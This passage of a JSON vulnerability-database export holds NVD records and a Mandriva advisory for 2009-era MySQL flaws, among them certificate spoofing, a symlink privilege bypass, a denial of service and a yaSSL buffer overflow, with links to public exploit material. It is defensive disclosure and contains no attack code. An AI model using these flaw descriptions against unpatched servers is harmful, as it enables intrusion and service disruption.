"enchantments": {"score": {"modified": "2018-01-05T12:19:53", "vector": "NONE", "value": 7.2}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11116", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11116"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-4030"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11116", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11116"}], "modified": "2018-01-04T21:29:01", "cpe": ["cpe:/a:mysql:mysql:5.1.7", "cpe:/a:mysql:mysql:5.1.11", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:mysql:mysql:5.1.15", "cpe:/a:mysql:mysql:5.1.8", "cpe:/a:mysql:mysql:5.1.21", "cpe:/a:mysql:mysql:5.1.4", "cpe:/a:mysql:mysql:5.1.20", "cpe:/a:mysql:mysql:5.1.17", "cpe:/a:mysql:mysql:5.1.23a", "cpe:/a:mysql:mysql:5.1.13", "cpe:/a:mysql:mysql:5.1.6", "cpe:/a:mysql:mysql:5.1.12", "cpe:/a:mysql:mysql:5.1.9", "cpe:/a:mysql:mysql:5.1", "cpe:/a:mysql:mysql:5.1.14", "cpe:/a:mysql:mysql:5.1.19", "cpe:/a:mysql:mysql:5.1.5a", "cpe:/a:mysql:mysql:5.1.3", "cpe:/a:mysql:mysql:5.1.22", "cpe:/a:mysql:mysql:5.1.16", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:mysql:mysql:5.1.23_bk", "cpe:/a:mysql:mysql:5.1.18", "cpe:/a:mysql:mysql:5.1.1", "cpe:/a:mysql:mysql:5.1.32-bzr", "cpe:/a:mysql:mysql:5.1.2", "cpe:/a:mysql:mysql:5.1.30", "cpe:/a:mysql:mysql:5.1.10"], "id": "CVE-2009-4030", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4030", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-19T13:36:42", "references": ["http://lists.mysql.com/commits/87446", "http://marc.info/?l=oss-security&m=125881733826437&w=2", "http://bugs.mysql.com/47320", "http://www.vupen.com/english/advisories/2010/1107", "http://www.redhat.com/support/errata/RHSA-2010-0109.html", "http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00001.html", "http://dev.mysql.com/doc/refman/5.0/en/news-5-0-88.html", "http://www.openwall.com/lists/oss-security/2009/11/19/3", "http://www.openwall.com/lists/oss-security/2009/11/23/16", "http://dev.mysql.com/doc/refman/5.1/en/news-5-1-41.html"], "description": "The vio_verify_callback function in viosslfactories.c in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41, when OpenSSL is used, accepts a value of zero for the depth of X.509 certificates, which allows man-in-the-middle attackers to spoof arbitrary SSL-based MySQL servers via a crafted certificate, as demonstrated by a certificate presented by a server linked against the yaSSL library.", "edition": 2, "reporter": "NVD", "published": "2009-11-30T12:30:00", "title": "CVE-2009-4028", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:42", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10940", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10940"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-4028"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10940", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10940"}], "modified": "2017-09-18T21:29:54", "cpe": ["cpe:/a:mysql:mysql:5.1.34", "cpe:/a:mysql:mysql:5.0.18", "cpe:/a:mysql:mysql:5.0.4", "cpe:/a:mysql:mysql:5.1.7", "cpe:/a:mysql:mysql:5.1.11", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:mysql:mysql:5.0.16a", "cpe:/a:mysql:mysql:5.0.42", "cpe:/a:mysql:mysql:5.0.24a", "cpe:/a:mysql:mysql:5.0.0", "cpe:/a:mysql:mysql:5.0", "cpe:/a:mysql:mysql:5.1.40:sp1", "cpe:/a:mysql:mysql:5.0.3a", "cpe:/a:mysql:mysql:5.0.1a", "cpe:/a:mysql:mysql:5.1.15", "cpe:/a:mysql:mysql:5.0.5", "cpe:/a:mysql:mysql:5.1.8", "cpe:/a:mysql:mysql:5.0.66", "cpe:/a:mysql:mysql:5.1.33", "cpe:/a:mysql:mysql:5.1.38", "cpe:/a:mysql:mysql:5.1.23:a", "cpe:/a:mysql:mysql:5.0.60", "cpe:/a:mysql:mysql:5.1.31", "cpe:/a:mysql:mysql:5.1.21", "cpe:/a:mysql:mysql:5.0.1", "cpe:/a:mysql:mysql:5.0.33", "cpe:/a:mysql:mysql:5.0.12", "cpe:/a:mysql:mysql:5.1.4", "cpe:/a:mysql:mysql:5.0.50", "cpe:/a:mysql:mysql:5.1.27", "cpe:/a:mysql:mysql:5.0.24", "cpe:/a:mysql:mysql:5.0.38", "cpe:/a:mysql:mysql:5.1.37", "cpe:/a:mysql:mysql:5.0.41", "cpe:/a:mysql:mysql:5.1.20", "cpe:/a:mysql:mysql:5.1.35", "cpe:/a:mysql:mysql:5.1.17", "cpe:/a:mysql:mysql:5.1.23a", "cpe:/a:mysql:mysql:5.0.22.1.0.1", "cpe:/a:mysql:mysql:5.0.84", "cpe:/a:mysql:mysql:5.0.17a", "cpe:/a:mysql:mysql:5.0.4a", "cpe:/a:mysql:mysql:5.0.37", "cpe:/a:mysql:mysql:5.1.13", "cpe:/a:mysql:mysql:5.0.15a", "cpe:/a:mysql:mysql:5.1.34:sp1", "cpe:/a:mysql:mysql:5.1.6", "cpe:/a:mysql:mysql:5.0.75", "cpe:/a:mysql:mysql:5.1.12", "cpe:/a:mysql:mysql:5.1.9", "cpe:/a:mysql:mysql:5.0.30:sp1", "cpe:/a:mysql:mysql:5.0.0.0", "cpe:/a:mysql:mysql:5.0.20", "cpe:/a:mysql:mysql:5.1.28", "cpe:/a:mysql:mysql:5.0.13", "cpe:/a:mysql:mysql:5.0.83", "cpe:/a:mysql:mysql:5.1.37:sp1", "cpe:/a:mysql:mysql:5.0.45", "cpe:/a:mysql:mysql:5.0.6", "cpe:/a:mysql:mysql:5.0.86", "cpe:/a:mysql:mysql:5.0.30", "cpe:/a:mysql:mysql:5.0.27", "cpe:/a:mysql:mysql:5.0.3", "cpe:/a:mysql:mysql:5.1", "cpe:/a:mysql:mysql:5.0.51a", "cpe:/a:mysql:mysql:5.0.0:alpha", "cpe:/a:mysql:mysql:5.0.20a", "cpe:/a:mysql:mysql:5.1.40", "cpe:/a:mysql:mysql:5.0.54", "cpe:/a:mysql:mysql:5.1.31:sp1", "cpe:/a:mysql:mysql:5.1.36", "cpe:/a:mysql:mysql:5.0.21", "cpe:/a:mysql:mysql:5.1.32", "cpe:/a:mysql:mysql:5.0.77", "cpe:/a:mysql:mysql:5.0.2", "cpe:/a:mysql:mysql:5.0.81", "cpe:/a:mysql:mysql:5.1.14", "cpe:/a:mysql:mysql:5.0.11", "cpe:/a:mysql:mysql:5.1.39", "cpe:/a:mysql:mysql:5.0.32", "cpe:/a:mysql:mysql:5.0.16", "cpe:/a:mysql:mysql:5.0.7", "cpe:/a:mysql:mysql:5.1.25", "cpe:/a:mysql:mysql:5.1.29", "cpe:/a:mysql:mysql:5.1.19", "cpe:/a:mysql:mysql:5.1.5a", "cpe:/a:mysql:mysql:5.1.3", "cpe:/a:mysql:mysql:5.0.56", "cpe:/a:mysql:mysql:5.0.25", "cpe:/a:mysql:mysql:5.0.44", "cpe:/a:mysql:mysql:5.0.3:beta", "cpe:/a:mysql:mysql:5.1.22", "cpe:/a:mysql:mysql:5.1.16", "cpe:/a:mysql:mysql:5.0.22", "cpe:/a:mysql:mysql:5.1.24", "cpe:/a:mysql:mysql:5.0.85", "cpe:/a:mysql:mysql:5.0.5.0.21", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:mysql:mysql:5.0.23", "cpe:/a:mysql:mysql:5.1.23_bk", "cpe:/a:mysql:mysql:5.0.19", "cpe:/a:mysql:mysql:5.1.18", "cpe:/a:mysql:mysql:5.0.15", "cpe:/a:mysql:mysql:5.0.10a", "cpe:/a:mysql:mysql:5.0.52", "cpe:/a:mysql:mysql:5.0.8", "cpe:/a:mysql:mysql:5.0.26", "cpe:/a:mysql:mysql:5.1.26", "cpe:/a:mysql:mysql:5.1.1", "cpe:/a:mysql:mysql:5.0.82", "cpe:/a:mysql:mysql:5.1.32-bzr", "cpe:/a:mysql:mysql:5.0.36", "cpe:/a:mysql:mysql:5.0.14", "cpe:/a:mysql:mysql:5.0.10", "cpe:/a:mysql:mysql:5.0.87", "cpe:/a:mysql:mysql:5.0.51b", "cpe:/a:mysql:mysql:5.1.2", "cpe:/a:mysql:mysql:5.0.17", "cpe:/a:mysql:mysql:5.0.51", "cpe:/a:mysql:mysql:5.1.30", "cpe:/a:mysql:mysql:5.1.10"], "id": "CVE-2009-4028", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4028", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-05T12:19:39", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=543619", "http://lists.mysql.com/commits/59711", "http://www.ubuntu.com/usn/USN-1397-1", "http://marc.info/?l=oss-security&m=125908040022018&w=2", "http://www.vupen.com/english/advisories/2010/1107", "http://www.mandriva.com/security/advisories?name=MDVSA-2010:044", "http://ubuntu.com/usn/usn-897-1", "http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00001.html", "http://support.apple.com/kb/HT4077", "http://lists.opensuse.org/opensuse-security-announce/2010-11/msg00005.html", "http://bugs.mysql.com/bug.php?id=39277", "http://lists.apple.com/archives/security-announce/2010//Mar/msg00001.html", "http://www.securityfocus.com/bid/38043"], "description": "sql/sql_table.cc in MySQL 5.0.x through 5.0.88, 5.1.x through 5.1.41, and 6.0 before 6.0.9-alpha, when the data home directory contains a symlink to a different filesystem, allows remote authenticated users to bypass intended access restrictions by calling CREATE TABLE with a (1) DATA DIRECTORY or (2) INDEX DIRECTORY argument referring to a subdirectory that requires following this symlink.", "edition": 2, "reporter": "NVD", "published": "2009-11-30T12:30:00", "title": "CVE-2008-7247", "type": "cve", "enchantments": {"score": {"modified": "2018-01-05T12:19:39", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2008-7247"], "scanner": [], "modified": "2018-01-04T21:29:00", "cpe": ["cpe:/a:mysql:mysql:5.0.18", "cpe:/a:mysql:mysql:5.0.4", "cpe:/a:mysql:mysql:5.1.7", "cpe:/a:mysql:mysql:5.1.11", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:mysql:mysql:5.0.16a", "cpe:/a:mysql:mysql:5.0.42", "cpe:/a:mysql:mysql:5.0.24a", "cpe:/a:mysql:mysql:5.0.0", "cpe:/a:mysql:mysql:5.0", "cpe:/a:mysql:mysql:5.0.3a", "cpe:/a:mysql:mysql:5.0.1a", "cpe:/a:mysql:mysql:5.1.15", "cpe:/a:mysql:mysql:5.0.5", "cpe:/a:mysql:mysql:5.1.8", "cpe:/a:mysql:mysql:5.0.66", "cpe:/a:mysql:mysql:5.0.60", "cpe:/a:mysql:mysql:5.1.21", "cpe:/a:mysql:mysql:5.0.1", "cpe:/a:mysql:mysql:5.0.33", "cpe:/a:mysql:mysql:6.0.4", "cpe:/a:mysql:mysql:5.0.12", "cpe:/a:mysql:mysql:5.1.4", "cpe:/a:mysql:mysql:5.0.50", "cpe:/a:mysql:mysql:5.0.24", "cpe:/a:mysql:mysql:5.0.38", "cpe:/a:mysql:mysql:6.0.2", "cpe:/a:mysql:mysql:5.0.41", "cpe:/a:mysql:mysql:5.1.20", "cpe:/a:mysql:mysql:5.1.17", "cpe:/a:mysql:mysql:5.1.23a", "cpe:/a:mysql:mysql:5.0.22.1.0.1", "cpe:/a:mysql:mysql:5.0.17a", "cpe:/a:mysql:mysql:5.0.4a", "cpe:/a:mysql:mysql:5.0.37", "cpe:/a:mysql:mysql:6.0.1", "cpe:/a:mysql:mysql:5.1.13", "cpe:/a:mysql:mysql:5.0.15a", "cpe:/a:mysql:mysql:5.1.6", "cpe:/a:mysql:mysql:5.0.75", "cpe:/a:mysql:mysql:5.1.12", "cpe:/a:mysql:mysql:5.1.9", "cpe:/a:mysql:mysql:5.0.30:sp1", "cpe:/a:mysql:mysql:5.0.0.0", "cpe:/a:mysql:mysql:5.0.20", "cpe:/a:mysql:mysql:5.0.13", "cpe:/a:mysql:mysql:5.0.83", "cpe:/a:mysql:mysql:5.0.45", "cpe:/a:mysql:mysql:5.0.6", "cpe:/a:mysql:mysql:5.0.30", "cpe:/a:mysql:mysql:5.0.27", "cpe:/a:mysql:mysql:5.0.3", "cpe:/a:mysql:mysql:5.1", "cpe:/a:mysql:mysql:5.0.51a", "cpe:/a:mysql:mysql:5.0.0:alpha", "cpe:/a:mysql:mysql:5.0.20a", "cpe:/a:mysql:mysql:5.0.54", "cpe:/a:mysql:mysql:5.0.21", "cpe:/a:mysql:mysql:5.0.77", "cpe:/a:mysql:mysql:5.0.2", "cpe:/a:mysql:mysql:5.0.81", "cpe:/a:mysql:mysql:5.1.14", "cpe:/a:mysql:mysql:6.0.3", "cpe:/a:mysql:mysql:5.0.11", "cpe:/a:mysql:mysql:5.0.32", "cpe:/a:mysql:mysql:5.0.16", "cpe:/a:mysql:mysql:5.0.7", "cpe:/a:mysql:mysql:5.1.19", "cpe:/a:mysql:mysql:5.1.5a", "cpe:/a:mysql:mysql:5.1.3", "cpe:/a:mysql:mysql:5.0.56", "cpe:/a:mysql:mysql:5.0.25", "cpe:/a:mysql:mysql:5.0.44", "cpe:/a:mysql:mysql:5.0.3:beta", "cpe:/a:mysql:mysql:5.1.22", "cpe:/a:mysql:mysql:5.1.16", "cpe:/a:mysql:mysql:5.0.22", "cpe:/a:mysql:mysql:5.0.5.0.21", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:mysql:mysql:5.0.23", "cpe:/a:mysql:mysql:5.1.23_bk", "cpe:/a:mysql:mysql:5.0.19", "cpe:/a:mysql:mysql:5.1.18", "cpe:/a:mysql:mysql:5.0.15", "cpe:/a:mysql:mysql:5.0.10a", "cpe:/a:mysql:mysql:5.0.52", "cpe:/a:mysql:mysql:5.0.8", "cpe:/a:mysql:mysql:5.0.26", "cpe:/a:mysql:mysql:5.1.1", "cpe:/a:mysql:mysql:5.0.82", "cpe:/a:mysql:mysql:5.1.32-bzr", "cpe:/a:mysql:mysql:6.0.0", "cpe:/a:mysql:mysql:5.0.36", "cpe:/a:mysql:mysql:5.0.14", "cpe:/a:mysql:mysql:6.0.9", "cpe:/a:mysql:mysql:5.0.10", "cpe:/a:mysql:mysql:5.0.51b", "cpe:/a:mysql:mysql:5.1.2", "cpe:/a:mysql:mysql:5.0.17", "cpe:/a:mysql:mysql:5.0.51", "cpe:/a:mysql:mysql:5.1.30", "cpe:/a:mysql:mysql:5.1.10"], "id": "CVE-2008-7247", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7247", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-05T12:19:53", "references": ["http://www.debian.org/security/2010/dsa-1997", "http://marc.info/?l=oss-security&m=125881733826437&w=2", "http://www.ubuntu.com/usn/USN-1397-1", "http://bugs.mysql.com/47780", "https://bugzilla.redhat.com/show_bug.cgi?id=540906", "http://marc.info/?l=oss-security&m=125883754215621&w=2", "http://www.vupen.com/english/advisories/2010/1107", "http://www.redhat.com/support/errata/RHSA-2010-0109.html", "https://www.redhat.com/archives/fedora-package-announce/2009-December/msg00764.html", "http://ubuntu.com/usn/usn-897-1", "http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00001.html", "http://dev.mysql.com/doc/refman/5.0/en/news-5-0-88.html", "http://support.apple.com/kb/HT4077", "http://marc.info/?l=oss-security&m=125901161824278&w=2", "http://bugs.mysql.com/48291", "http://lists.apple.com/archives/security-announce/2010//Mar/msg00001.html", "http://dev.mysql.com/doc/refman/5.1/en/news-5-1-41.html"], "description": "mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does not (1) properly handle errors during execution of certain SELECT statements with subqueries, and does not (2) preserve certain null_value flags during execution of statements that use the GeomFromWKB function, which allows remote authenticated users to cause a denial of service (daemon crash) via a crafted statement.", "edition": 3, "reporter": "NVD", "published": "2009-11-30T12:30:00", "title": "CVE-2009-4019", "type": "cve", "enchantments": {"score": {"modified": "2018-01-05T12:19:53", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11349", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11349"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-4019"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:11349", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:11349"}], "modified": "2018-01-04T21:29:01", "cpe": ["cpe:/a:mysql:mysql:5.0.18", "cpe:/a:mysql:mysql:5.0.4", "cpe:/a:mysql:mysql:5.1.7", "cpe:/a:mysql:mysql:5.1.11", "cpe:/a:mysql:mysql:5.1.23", "cpe:/a:mysql:mysql:5.0.16a", "cpe:/a:mysql:mysql:5.0.42", "cpe:/a:mysql:mysql:5.0.24a", "cpe:/a:mysql:mysql:5.0.0", "cpe:/a:mysql:mysql:5.0", "cpe:/a:mysql:mysql:5.0.3a", "cpe:/a:mysql:mysql:5.0.1a", "cpe:/a:mysql:mysql:5.1.15", "cpe:/a:mysql:mysql:5.0.5", "cpe:/a:mysql:mysql:5.1.8", "cpe:/a:mysql:mysql:5.0.66", "cpe:/a:mysql:mysql:5.0.60", "cpe:/a:mysql:mysql:5.1.21", "cpe:/a:mysql:mysql:5.0.1", "cpe:/a:mysql:mysql:5.0.33", "cpe:/a:mysql:mysql:5.0.12", "cpe:/a:mysql:mysql:5.1.4", "cpe:/a:mysql:mysql:5.0.50", "cpe:/a:mysql:mysql:5.0.24", "cpe:/a:mysql:mysql:5.0.38", "cpe:/a:mysql:mysql:5.0.41", "cpe:/a:mysql:mysql:5.1.20", "cpe:/a:mysql:mysql:5.1.17", "cpe:/a:mysql:mysql:5.1.23a", "cpe:/a:mysql:mysql:5.0.22.1.0.1", "cpe:/a:mysql:mysql:5.0.17a", "cpe:/a:mysql:mysql:5.0.4a", "cpe:/a:mysql:mysql:5.0.37", "cpe:/a:mysql:mysql:5.1.13", "cpe:/a:mysql:mysql:5.0.15a", "cpe:/a:mysql:mysql:5.1.6", "cpe:/a:mysql:mysql:5.0.75", "cpe:/a:mysql:mysql:5.1.12", "cpe:/a:mysql:mysql:5.1.9", "cpe:/a:mysql:mysql:5.0.30:sp1", "cpe:/a:mysql:mysql:5.0.0.0", "cpe:/a:mysql:mysql:5.0.20", "cpe:/a:mysql:mysql:5.0.13", "cpe:/a:mysql:mysql:5.0.83", "cpe:/a:mysql:mysql:5.0.45", "cpe:/a:mysql:mysql:5.0.6", "cpe:/a:mysql:mysql:5.0.30", "cpe:/a:mysql:mysql:5.0.27", "cpe:/a:mysql:mysql:5.0.3", "cpe:/a:mysql:mysql:5.1", "cpe:/a:mysql:mysql:5.0.51a", "cpe:/a:mysql:mysql:5.0.0:alpha", "cpe:/a:mysql:mysql:5.0.20a", "cpe:/a:mysql:mysql:5.0.54", "cpe:/a:mysql:mysql:5.0.21", "cpe:/a:mysql:mysql:5.0.77", "cpe:/a:mysql:mysql:5.0.2", "cpe:/a:mysql:mysql:5.0.81", "cpe:/a:mysql:mysql:5.1.14", "cpe:/a:mysql:mysql:5.0.11", "cpe:/a:mysql:mysql:5.0.32", "cpe:/a:mysql:mysql:5.0.16", "cpe:/a:mysql:mysql:5.0.7", "cpe:/a:mysql:mysql:5.1.19", "cpe:/a:mysql:mysql:5.1.5a", "cpe:/a:mysql:mysql:5.1.3", "cpe:/a:mysql:mysql:5.0.56", "cpe:/a:mysql:mysql:5.0.25", "cpe:/a:mysql:mysql:5.0.44", "cpe:/a:mysql:mysql:5.0.3:beta", "cpe:/a:mysql:mysql:5.1.22", "cpe:/a:mysql:mysql:5.1.16", "cpe:/a:mysql:mysql:5.0.22", "cpe:/a:mysql:mysql:5.0.5.0.21", "cpe:/a:mysql:mysql:5.1.5", "cpe:/a:mysql:mysql:5.0.23", "cpe:/a:mysql:mysql:5.1.23_bk", "cpe:/a:mysql:mysql:5.0.19", "cpe:/a:mysql:mysql:5.1.18", "cpe:/a:mysql:mysql:5.0.15", "cpe:/a:mysql:mysql:5.0.10a", "cpe:/a:mysql:mysql:5.0.52", "cpe:/a:mysql:mysql:5.0.8", "cpe:/a:mysql:mysql:5.0.26", "cpe:/a:mysql:mysql:5.1.1", "cpe:/a:mysql:mysql:5.0.82", "cpe:/a:mysql:mysql:5.1.32-bzr", "cpe:/a:mysql:mysql:5.0.36", "cpe:/a:mysql:mysql:5.0.14", "cpe:/a:mysql:mysql:5.0.10", "cpe:/a:mysql:mysql:5.0.51b", "cpe:/a:mysql:mysql:5.1.2", "cpe:/a:mysql:mysql:5.0.17", "cpe:/a:mysql:mysql:5.0.51", "cpe:/a:mysql:mysql:5.1.30", "cpe:/a:mysql:mysql:5.1.10"], "id": "CVE-2009-4019", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4019", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-05T12:19:55", "references": ["http://dev.mysql.com/doc/refman/5.1/en/news-5-1-43.html", "http://www.debian.org/security/2010/dsa-1997", "http://securitytracker.com/id?1023402", "http://www.securityfocus.com/bid/37974", "http://www.ubuntu.com/usn/USN-1397-1", "http://www.intevydis.com/blog/?p=106", "https://bugzilla.redhat.com/show_bug.cgi?id=555313", "http://securitytracker.com/id?1023513", "http://www.intevydis.com/blog/?p=57", "http://www.securityfocus.com/bid/37640", "http://www.yassl.com/release.html", "http://www.metasploit.com/modules/exploit/linux/mysql/mysql_yassl_getname", "http://intevydis.com/mysql_demo.html", "http://bazaar.launchpad.net/~mysql/mysql-server/mysql-5.0/revision/2837.1.1", "http://intevydis.blogspot.com/2010/01/mysq-yassl-stack-overflow.html", "http://dev.mysql.com/doc/refman/5.0/en/news-5-0-90.html", "http://www.vupen.com/english/advisories/2010/0233", "http://lists.mysql.com/commits/96697", "http://isc.sans.org/diary.html?storyid=7900", "http://ubuntu.com/usn/usn-897-1", "http://intevydis.com/mysql_overflow1.py.txt", "http://archives.neohapsis.com/archives/dailydave/2010-q1/0002.html", "http://lists.immunitysec.com/pipermail/dailydave/2010-January/006020.html", "http://yassl.cvs.sourceforge.net/viewvc/yassl/yassl/taocrypt/src/asn.cpp?r1=1.13&r2=1.14", "https://exchange.xforce.ibmcloud.com/vulnerabilities/55416", "http://www.yassl.com/news.html#yassl199", "http://www.securityfocus.com/bid/37943", "http://bugs.mysql.com/bug.php?id=50227", "http://www.vupen.com/english/advisories/2010/0236"], "description": "Multiple stack-based buffer overflows in the CertDecoder::GetName function in src/asn.cpp in TaoCrypt in yaSSL before 1.9.9, as used in mysqld in MySQL 5.0.x before 5.0.90, MySQL 5.1.x before 5.1.43, MySQL 5.5.x through 5.5.0-m2, and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption and daemon crash) by establishing an SSL connection and sending an X.509 client certificate with a crafted name field, as demonstrated by mysql_overflow1.py and the vd_mysql5 module in VulnDisco Pack Professional 8.11. NOTE: this was originally reported for MySQL 5.0.51a.", "edition": 3, "reporter": "NVD", "published": "2009-12-30T16:30:00", "title": "CVE-2009-4484", "type": "cve", "enchantments": {"score": {"modified": "2018-01-05T12:19:55", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-4484"], "scanner": [], "modified": "2018-01-04T21:29:01", "cpe": ["cpe:/a:mysql:mysql:5.0.51a"], "id": "CVE-2009-4484", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4484", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:35", "references": ["https://vulners.com/securityvulns/securityvulns:doc:23063"], "description": "Certificate spoofing, privilege escalation, DoS.", "edition": 1, "reporter": "BUGTRAQ", "published": "2010-01-19T00:00:00", "title": "MySQL multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:35", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "MySQL", "version": "5.1", "operator": "eq"}, {"name": "MySQL", "version": "5.0", "operator": "eq"}], "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2009-4019"], "modified": "2010-01-19T00:00:00", "id": "SECURITYVULNS:VULN:10531", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10531", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:33", "references": [], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2010:012\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : mysql\r\n Date : January 17, 2010\r\n Affected: 2009.1, 2010.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities has been found and corrected in mysql:\r\n \r\n mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does\r\n not (1) properly handle errors during execution of certain SELECT\r\n statements with subqueries, and does not (2) preserve certain\r\n null_value flags during execution of statements that use the\r\n GeomFromWKB function, which allows remote authenticated users to\r\n cause a denial of service (daemon crash) via a crafted statement\r\n (CVE-2009-4019).\r\n \r\n The vio_verify_callback function in viosslfactories.c in MySQL\r\n 5.0.x before 5.0.88 and 5.1.x before 5.1.41, when OpenSSL is used,\r\n accepts a value of zero for the depth of X.509 certificates, which\r\n allows man-in-the-middle attackers to spoof arbitrary SSL-based MySQL\r\n servers via a crafted certificate, as demonstrated by a certificate\r\n presented by a server linked against the yaSSL library (CVE-2009-4028).\r\n \r\n MySQL 5.1.x before 5.1.41 allows local users to bypass certain\r\n privilege checks by calling CREATE TABLE on a MyISAM table with\r\n modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments\r\n that are originally associated with pathnames without symlinks,\r\n and that can point to tables created at a future time at which a\r\n pathname is modified to contain a symlink to a subdirectory of the\r\n MySQL data home directory, related to incorrect calculation of the\r\n mysql_unpacked_real_data_home value. NOTE: this vulnerability exists\r\n because of an incomplete fix for CVE-2008-4098 and CVE-2008-2079\r\n (CVE-2009-4030).\r\n \r\n The updated packages have been patched to correct these\r\n issues. Additionally for 2009.1 and 2010.0 mysql has also been upgraded\r\n to the latest stable 5.1 release (5.1.42).\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4019\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4028\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4030\r\n http://dev.mysql.com/doc/refman/5.1/en/news-5-1-35.html\r\n http://dev.mysql.com/doc/refman/5.1/en/news-5-1-36.html\r\n http://dev.mysql.com/doc/refman/5.1/en/news-5-1-37.html\r\n http://dev.mysql.com/doc/refman/5.1/en/news-5-1-38.html\r\n http://dev.mysql.com/doc/refman/5.1/en/news-5-1-39.html\r\n http://dev.mysql.com/doc/refman/5.1/en/news-5-1-40.html\r\n http://dev.mysql.com/doc/refman/5.1/en/news-5-1-41.html\r\n http://dev.mysql.com/doc/refman/5.1/en/news-5-1-42.html\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2009.1:\r\n 2052354eb2f57325cc5a351aa8e7fa17 2009.1/i586/libmysql16-5.1.42-0.1mdv2009.1.i586.rpm\r\n f8b86535e2b9304340b95fc6b5e5ed53 2009.1/i586/libmysql-devel-5.1.42-0.1mdv2009.1.i586.rpm\r\n 0b2b4f3359a6b44614daf30e921faebf 2009.1/i586/libmysql-static-devel-5.1.42-0.1mdv2009.1.i586.rpm\r\n 0a007a4249e801fcf6ba7112c79e125b 2009.1/i586/mysql-5.1.42-0.1mdv2009.1.i586.rpm\r\n 87664cc60c044a8415d54d4e1169556c 2009.1/i586/mysql-bench-5.1.42-0.1mdv2009.1.i586.rpm\r\n ec0a34be2a2abd3890e3b6163099231b 2009.1/i586/mysql-client-5.1.42-0.1mdv2009.1.i586.rpm\r\n 5f1526147c19c5dac3d5e926e75e6108 